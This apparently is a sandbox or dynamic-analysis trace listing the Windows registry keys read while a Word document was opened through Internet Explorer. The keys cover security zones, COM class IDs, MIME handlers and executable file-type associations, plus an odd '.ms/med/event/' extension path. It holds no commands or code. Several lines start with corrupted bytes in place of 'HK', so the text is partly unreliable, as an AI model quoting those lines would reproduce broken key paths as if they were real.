\xe6\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32
\xe7\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32
\xe7\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32\(Default)
\xe7\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32
\xe7\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\LoadTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Suggested Sites
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Suggested Sites\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Suggested Sites
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\OpenDirectlyInApp
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CURRENT_USER\Software\Microsoft\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{7b8a2d94-0ac9-11d1-896c-00c04fb6bfc4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InsecureQI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\OptimisticBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Safety\PrivacIE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Safety\PrivacIE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MediaTypeClass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\No3DBorder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\MenuUserExpanded
\xea\x97\xa0\xc7\xaeEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2101
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\UserChoice
HKEY_CURRENT_USER\Software\Classes\.doc
HKEY_LOCAL_MACHINE\Software\Classes\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1803
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\application/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\application/xml
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FEEDS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\*
HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\Flags
HKEY_CLASSES_ROOT\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}\DocObject
HKEY_CLASSES_ROOT\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\Content Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\application/msword\UserChoice
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/msword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword\Extension
HKEY_CURRENT_USER\Software\Classes\Word.Document.8\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{00020906-0000-0000-C000-000000000046}
\xea\x8c\xb8\xc7\xaeEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CLASSES_ROOT\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}\Control
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Plugins\MIME\text/xml
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Plugins\Extension\.doc
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\iexplore.exe
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020906-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler
HKEY_CLASSES_ROOT\.htm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.htm\(Default)
HKEY_CLASSES_ROOT\.html
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.html\(Default)
HKEY_CLASSES_ROOT\.mht
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mht\(Default)
HKEY_CLASSES_ROOT\.mhtml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mhtml\(Default)
HKEY_CLASSES_ROOT\.shtm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.shtm\(Default)
HKEY_CLASSES_ROOT\.shtml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.shtml\(Default)
HKEY_CLASSES_ROOT\.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xml\(Default)
HKEY_CLASSES_ROOT\.xsl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xsl\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Word.Document.8\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Word.Document.8
HKEY_CLASSES_ROOT\Word.Document.8
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\EditFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\AttachmentExecute\{0002DF01-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers\Word.Document.8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CLASSES_ROOT\.fxp
HKEY_CLASSES_ROOT\.gadget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gadget\(Default)
HKEY_CLASSES_ROOT\.grp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.grp\(Default)
HKEY_CLASSES_ROOT\.hlp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hlp\(Default)
HKEY_CLASSES_ROOT\.hta
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hta\(Default)
HKEY_CLASSES_ROOT\.inf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.inf\(Default)
HKEY_CLASSES_ROOT\.ins
HKEY_CLASSES_ROOT\.isp
HKEY_CLASSES_ROOT\.its
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\.jse
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.JSE\(Default)
HKEY_CLASSES_ROOT\.ksh
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.mad
HKEY_CLASSES_ROOT\.maf
HKEY_CLASSES_ROOT\.mag
HKEY_CLASSES_ROOT\.mam
HKEY_CLASSES_ROOT\.maq
HKEY_CLASSES_ROOT\.mar
HKEY_CLASSES_ROOT\.mas
HKEY_CLASSES_ROOT\.mat
HKEY_CLASSES_ROOT\.mau
HKEY_CLASSES_ROOT\.mav
HKEY_CLASSES_ROOT\.maw
HKEY_CLASSES_ROOT\.mcf
HKEY_CLASSES_ROOT\.mda
HKEY_CLASSES_ROOT\.mdb
HKEY_CLASSES_ROOT\.mde
HKEY_CLASSES_ROOT\.mdt
HKEY_CLASSES_ROOT\.mdw
HKEY_CLASSES_ROOT\.mdz
HKEY_CLASSES_ROOT\.msc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\(Default)
HKEY_CLASSES_ROOT\.msh
HKEY_CLASSES_ROOT\.mshxml
HKEY_CLASSES_ROOT\.msi
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msi\(Default)
HKEY_CLASSES_ROOT\.msp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msp\(Default)
HKEY_CLASSES_ROOT\.mst
HKEY_CLASSES_ROOT\.ops
HKEY_CLASSES_ROOT\.pcd
HKEY_CLASSES_ROOT\.pif
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pif\(Default)
HKEY_CLASSES_ROOT\.pl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pl\(Default)
HKEY_CLASSES_ROOT\.prf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.prf\(Default)
HKEY_CLASSES_ROOT\.prg
HKEY_CLASSES_ROOT\.pst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pst\(Default)
HKEY_CLASSES_ROOT\.reg
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg\(Default)
HKEY_CLASSES_ROOT\.scf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.scf\(Default)
HKEY_CLASSES_ROOT\.scr
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.scr\(Default)
HKEY_CLASSES_ROOT\.sct
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sct\(Default)
HKEY_CLASSES_ROOT\.shb
HKEY_CLASSES_ROOT\.shs
HKEY_CLASSES_ROOT\.tmp
HKEY_CLASSES_ROOT\.url
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)
HKEY_CLASSES_ROOT\.vb
HKEY_CLASSES_ROOT\.vbe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.VBE\(Default)
HKEY_CLASSES_ROOT\.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_CLASSES_ROOT\.vsmacros
HKEY_CLASSES_ROOT\.vss
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vss\(Default)
HKEY_CLASSES_ROOT\.vst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vst\(Default)
HKEY_CLASSES_ROOT\.vsw
HKEY_CLASSES_ROOT\.ws
HKEY_CLASSES_ROOT\.wsc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wsc\(Default)
HKEY_CLASSES_ROOT\.wsf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.WSF\(Default)
HKEY_CLASSES_ROOT\.wsh
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.WSH\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.doc
HKEY_CLASSES_ROOT\.doc\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\IsShortcut
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\ExecutableTypes
HKEY_CLASSES_ROOT\.ms/med/event/dNhfd4yt/dNhfd4yt/
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.ms/med/event/dnhfd4yt/dnhfd4yt/
HKEY_CLASSES_ROOT\.ms/med/event/dNhfd4yt/dNhfd4yt/\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ms/med/event/dNhfd4yt/dNhfd4yt/\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ms/med/event/dNhfd4yt/dNhfd4yt/
HKEY_CLASSES_ROOT\Unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\EditFlags
HKEY_CLASSES_ROOT\SystemFileAssociations\.ms/med/event/dNhfd4yt/dNhfd4yt/
HKEY_CLASSES_ROOT\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\EditFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\EditFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\System
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\FriendlyTypeName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOWNLOAD_PROMPT_META_CONTROL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DOWNLOAD_PROMPT_META_CONTROL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\MS Shell Dlg
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\application/msword\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\application/msword
HKEY_CLASSES_ROOT\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DownloadUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\DownloadUI
HKEY_CURRENT_USER\Software\Classes\Interface\{0000000E-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0000000E-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0000000E-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PhishingFilter
